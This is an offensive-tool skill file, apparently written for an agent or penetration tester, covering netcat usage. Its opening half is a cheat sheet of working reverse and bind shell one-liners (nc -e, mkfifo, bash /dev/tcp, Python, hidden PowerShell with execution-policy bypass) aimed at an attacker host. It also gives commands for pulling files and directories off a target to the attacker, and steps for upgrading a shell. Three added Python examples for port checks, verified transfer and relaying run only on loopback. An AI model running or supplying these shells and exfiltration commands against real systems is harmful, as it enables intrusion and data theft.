offensive-tools/network/netcat/SKILL.md
Netcat (nc/ncat): TCP/UDP Swiss Army knife for reverse shells, bind shells, port checks, banner grabbing, file transfer, port forwarding, and listener setup. Use when catching reverse shells, sending bind shells, testing port connectivity, grabbing service banners, or transferring files without SCP/FTP.
TCP/UDP utility — shells, file transfer, port probing, port forwarding.
```bash
# Listener (catch reverse shell)
nc -lvnp 4444
# Connect to port (test connectivity / banner grab)
nc -nv 10.10.10.10 80
# Reverse shell (from target; -e exists in traditional nc and ncat, not in OpenBSD nc)
nc -e /bin/bash <attacker_ip> 4444
```
| Flag | Purpose |
|------|---------|
| -l | Listen mode |
| -v | Verbose |
| -n | No DNS resolution |
| -p <port> | Local (source or listen) port |
| -e <cmd> | Execute command on connect (traditional nc and ncat only; OpenBSD nc has no -e, use the mkfifo shell below) |
| -u | UDP mode |
| -w <sec> | Connect / idle timeout |
| -z | Zero I/O mode (port scan; OpenBSD and traditional nc, not ncat) |
| -k | Keep listening after client disconnects (ncat, OpenBSD nc) |
| -N | Shut down the socket after EOF on stdin (OpenBSD nc; needed for clean file transfers) |
| -q <sec> | Quit N seconds after EOF on stdin (traditional nc) |
| --ssl | SSL/TLS (ncat only) |
```bash
# From Linux target (nc with -e: traditional nc or ncat)
nc -e /bin/bash <attacker> 4444
# From Linux target (nc without -e / busybox); needs a writable /tmp
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker> 4444 > /tmp/f
# From Windows target (ncat)
ncat -e cmd.exe <attacker> 4444
ncat -e powershell.exe <attacker> 4444
# Bash (no nc needed; requires a bash built with /dev/tcp support)
bash -i >& /dev/tcp/<attacker>/4444 0>&1
# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<attacker>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('<attacker>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
```bash
# Target listens (bind shell: anyone who can reach the port gets the shell)
nc -lvnp 4444 -e /bin/bash   # Linux
ncat -lvnp 4444 -e cmd.exe   # Windows
# Attacker connects
nc -nv <target_ip> 4444
```
```bash
# Banner grab (sshd volunteers its version line; HTTP says nothing until asked)
nc -nv 10.10.10.10 22
nc -nv 10.10.10.10 80
# Send HTTP request (echo -e is bash; use printf under dash/sh)
echo -e "HEAD / HTTP/1.0\r\n\r\n" | nc -nv 10.10.10.10 80
# Quick port check (-z: OpenBSD / traditional nc; ncat has no -z)
nc -z -nv 10.10.10.10 22
nc -z -nv 10.10.10.10 1-1000   # port scan (slow; use nmap instead)
```
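The port check and banner grab above, as an added Python example (not part of the original cheat sheet and not netcat's code): `port_open` does what `nc -z -w` does, `grab_banner` what `nc -nv` does, with an optional request for services such as HTTP that stay silent until asked. The two services it probes are constructed stand-ins started in-process so the block runs offline; the banner text, the `Server:` header and the loopback address are assumptions.

```python
"""Port check and banner grab the way `nc -z` and `nc -nv` do them, in Python.

Added example; not the original cheat sheet's code. The services it probes are
constructed stand-ins started in-process so everything runs offline.
"""
import socket
import threading


def port_open(host, port, timeout=2.0):
    """`nc -z -w <timeout> host port`: complete the TCP handshake, report, close."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:            # refused, unreachable, or timed out
        return False


def grab_banner(host, port, request=b"", timeout=2.0, max_bytes=4096):
    """`echo -e REQUEST | nc -nv host port`: send an optional request, then read
    what the service volunteers until it closes, max_bytes arrive, or it goes
    quiet for `timeout` seconds (sshd talks first; HTTP waits for a request)."""
    chunks, total = [], 0
    with socket.create_connection((host, port), timeout=timeout) as s:
        if request:
            s.sendall(request)
        s.settimeout(timeout)
        try:
            while total < max_bytes:
                data = s.recv(max_bytes - total)
                if not data:    # peer closed: EOF, the point at which nc exits
                    break
                chunks.append(data)
                total += len(data)
        except socket.timeout:
            pass                # silent service: return whatever arrived
    return b"".join(chunks)


# --- constructed targets (assumed banner text, loopback only) ---------------

def start_fake_service(handler):
    """Bind a throwaway loopback port and run handler(conn) per connection.
    Returns (server_socket, port); close the socket to stop the service."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))      # port 0: the OS picks a free port
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return              # server socket was closed
            with conn:
                try:
                    handler(conn)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def ssh_like(conn):
    """Behaves like sshd: sends its version line before the client says anything."""
    conn.sendall(b"SSH-2.0-OpenSSH_9.6\r\n")


def http_like(conn):
    """Behaves like a web server: silent until a complete request header arrives."""
    conn.settimeout(2.0)
    req = b""
    while b"\r\n\r\n" not in req:
        chunk = conn.recv(1024)
        if not chunk:
            return
        req += chunk
    conn.sendall(b"HTTP/1.0 200 OK\r\nServer: constructed/1.0\r\n\r\n")


def closed_port():
    """Pick a loopback port nothing listens on (the negative case for port_open)."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


if __name__ == "__main__":
    srv, port = start_fake_service(ssh_like)
    print(port_open("127.0.0.1", port), grab_banner("127.0.0.1", port))
    srv.close()
    srv, port = start_fake_service(http_like)
    print(grab_banner("127.0.0.1", port, b"HEAD / HTTP/1.0\r\n\r\n").decode())
    srv.close()
    print(port_open("127.0.0.1", closed_port(), timeout=1.0))
```

The read loop stops on three conditions, and that matters when scripting this against real hosts: a service that closes after its banner gives EOF, a chatty one is capped by `max_bytes`, and a silent one is cut off by the idle timeout instead of hanging the scan the way a bare `nc` without `-w` would.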
```bash
# Receiver (attacker)
nc -lvnp 9999 > received_file
# Sender (target): add -N (OpenBSD nc) or -q 1 (traditional nc) so the sender closes at EOF,
# then compare sha256sum on both ends; nc gives no completion signal and no integrity check
nc -nv <attacker> 9999 < file_to_send
# Directory (tar pipe)
# Receiver
nc -lvnp 9999 | tar xvf -
# Sender
tar cvf - /path/to/dir | nc -nv <attacker> 9999
```
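Plain `nc` streams bytes and nothing else: the receiver cannot tell "transfer done" from "connection dropped", and nothing checks the result. The following added Python example (not the cheat sheet's or netcat's code) shows what the missing pieces look like: the sender prefixes the data with its length and SHA-256 and half-closes the socket at EOF (the job `-N` / `-q` do for nc), and the receiver reports truncation and corruption separately. It runs sender and receiver on loopback; the ports are OS-chosen and the two injected faults are constructed.

```python
"""File transfer with a completion signal and an integrity check, in Python.

Added example; not the original cheat sheet's code. Runs on loopback; the
truncation and corruption faults are constructed for demonstration.
"""
import hashlib
import socket
import struct
import threading

HEADER = struct.Struct("!Q32s")   # 8-byte length + 32-byte SHA-256, network byte order


def send_bytes(host, port, data, truncate_at=None, corrupt_at=None):
    """Sender side (the `nc <attacker> 9999 < file_to_send` role).
    truncate_at / corrupt_at are constructed faults: stop after N bytes
    (dropped link) or flip one byte (bit rot)."""
    digest = hashlib.sha256(data).digest()
    payload = bytearray(data)
    if corrupt_at is not None:
        payload[corrupt_at] ^= 0xFF
    if truncate_at is not None:
        payload = payload[:truncate_at]
    with socket.create_connection((host, port), timeout=5.0) as s:
        s.sendall(HEADER.pack(len(data), digest) + bytes(payload))
        s.shutdown(socket.SHUT_WR)  # explicit EOF: what nc needs -N (OpenBSD) / -q 1 (traditional) for


def recv_exact(conn, n):
    """Read n bytes, or fewer if the peer closes first (the truncation case)."""
    buf = bytearray()
    while len(buf) < n:
        chunk = conn.recv(min(65536, n - len(buf)))
        if not chunk:
            break
        buf.extend(chunk)
    return bytes(buf)


def receive_bytes(conn):
    """Receiver side (the `nc -lvnp 9999 > received_file` role): returns a verdict."""
    hdr = recv_exact(conn, HEADER.size)
    if len(hdr) < HEADER.size:
        return {"ok": False, "reason": "no header", "data": b""}
    length, expected = HEADER.unpack(hdr)
    data = recv_exact(conn, length)
    if len(data) < length:
        return {"ok": False, "reason": f"short read: {len(data)}/{length} bytes", "data": data}
    if hashlib.sha256(data).digest() != expected:
        return {"ok": False, "reason": "sha256 mismatch", "data": data}
    return {"ok": True, "reason": "verified", "data": data}


def transfer(data, truncate_at=None, corrupt_at=None):
    """Run receiver (listener) and sender on loopback; return the receiver's verdict."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))       # port 0: the OS picks a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    verdict = {}

    def receiver():
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(5.0)
            verdict.update(receive_bytes(conn))

    t = threading.Thread(target=receiver)
    t.start()
    send_bytes("127.0.0.1", port, data, truncate_at, corrupt_at)
    t.join(10.0)
    srv.close()
    return verdict


if __name__ == "__main__":
    blob = b"constructed sample payload " * 4000     # ~105 KiB, spans several TCP segments
    for faults in ({}, {"truncate_at": 1000}, {"corrupt_at": 42}):
        v = transfer(blob, **faults)
        print(faults or "no fault", "->", v["ok"], v["reason"])
```

With raw `nc` the equivalent check is manual: run `sha256sum` on both ends after the transfer and compare, and remember that without `-N` / `-q` the sender side sits open after EOF until one end is killed.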
```bash
# Forward local 8080 → remote 80 (add -k so the listener keeps serving after the first client disconnects)
ncat -lvnp 8080 --sh-exec "ncat 10.10.10.10 80"
# Relay (ncat broker: every connected client receives what the others send)
ncat -lvnp 4444 --broker
```
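What the `--sh-exec` forward above actually does, as an added Python example (not the cheat sheet's or ncat's code): every client that reaches the listener gets its own upstream connection and bytes are pumped in both directions until each side closes, with EOF propagated as a half-close so the far end sees it. The listener keeps accepting, which is the `-k` behaviour. The target is a constructed echo server on loopback; addresses and ports are assumptions.

```python
"""A TCP relay in Python: the job of `ncat -lkvnp 8080 --sh-exec "ncat 10.10.10.10 80"`.

Added example; not the original cheat sheet's code or ncat's. The target is a
constructed echo server on loopback so the block runs offline.
"""
import socket
import threading


def pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the far
    side sees the same EOF (this is how a half-closed session propagates)."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_session(client, target):
    """One relayed session: dial the target, then pump both directions."""
    try:
        upstream = socket.create_connection(target, timeout=5.0)
    except OSError:
        client.close()          # target down: drop the client, as ncat does when its child exits
        return
    upstream.settimeout(None)
    threads = [threading.Thread(target=pump, args=(client, upstream), daemon=True),
               threading.Thread(target=pump, args=(upstream, client), daemon=True)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    client.close()
    upstream.close()


def start_relay(target, bind=("127.0.0.1", 0)):
    """Listen on `bind` (port 0: the OS picks) and relay every client to `target`.
    Keeps accepting after a client leaves, i.e. the -k behaviour.
    Returns (server_socket, bound_port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(bind)
    srv.listen(16)
    port = srv.getsockname()[1]

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return          # listener closed
            threading.Thread(target=relay_session, args=(client, target), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, port


# --- constructed target and client ------------------------------------------

def echo(conn):
    """Echo until the client half-closes: read from the socket, write back to it."""
    with conn:
        pump(conn, conn)


def start_echo_server():
    """Stand-in for the real service behind the relay. Returns (server_socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=echo, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def through_relay(relay_port, payload, timeout=5.0):
    """Client side, like `nc -nv 127.0.0.1 <relay_port>`: send, half-close, read reply to EOF."""
    with socket.create_connection(("127.0.0.1", relay_port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        reply = b""
        while True:
            chunk = s.recv(65536)
            if not chunk:
                return reply
            reply += chunk


if __name__ == "__main__":
    echo_srv, echo_port = start_echo_server()
    relay_srv, relay_port = start_relay(("127.0.0.1", echo_port))
    print(through_relay(relay_port, b"GET / HTTP/1.0\r\n\r\n"))
    relay_srv.close()
    echo_srv.close()
```

The half-close in `pump` is the detail that separates a working relay from one that hangs: without it a client that has finished sending (an HTTP/1.0 request, a piped file) never gets EOF from the target, because the target never learns the client is done.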
```bash
# On target (in the nc shell): get a pty
python3 -c 'import pty; pty.spawn("/bin/bash")'
# On attacker: background nc with Ctrl+Z, then
stty raw -echo; fg
# Back on target: set terminal type and size (match your real terminal; `stty size` shows it)
export TERM=xterm
stty rows 40 cols 160
```
| File | When to load |
|------|--------------|
| references/shells.md | Full reverse shell one-liners for all languages, shell upgrade steps, Windows shells |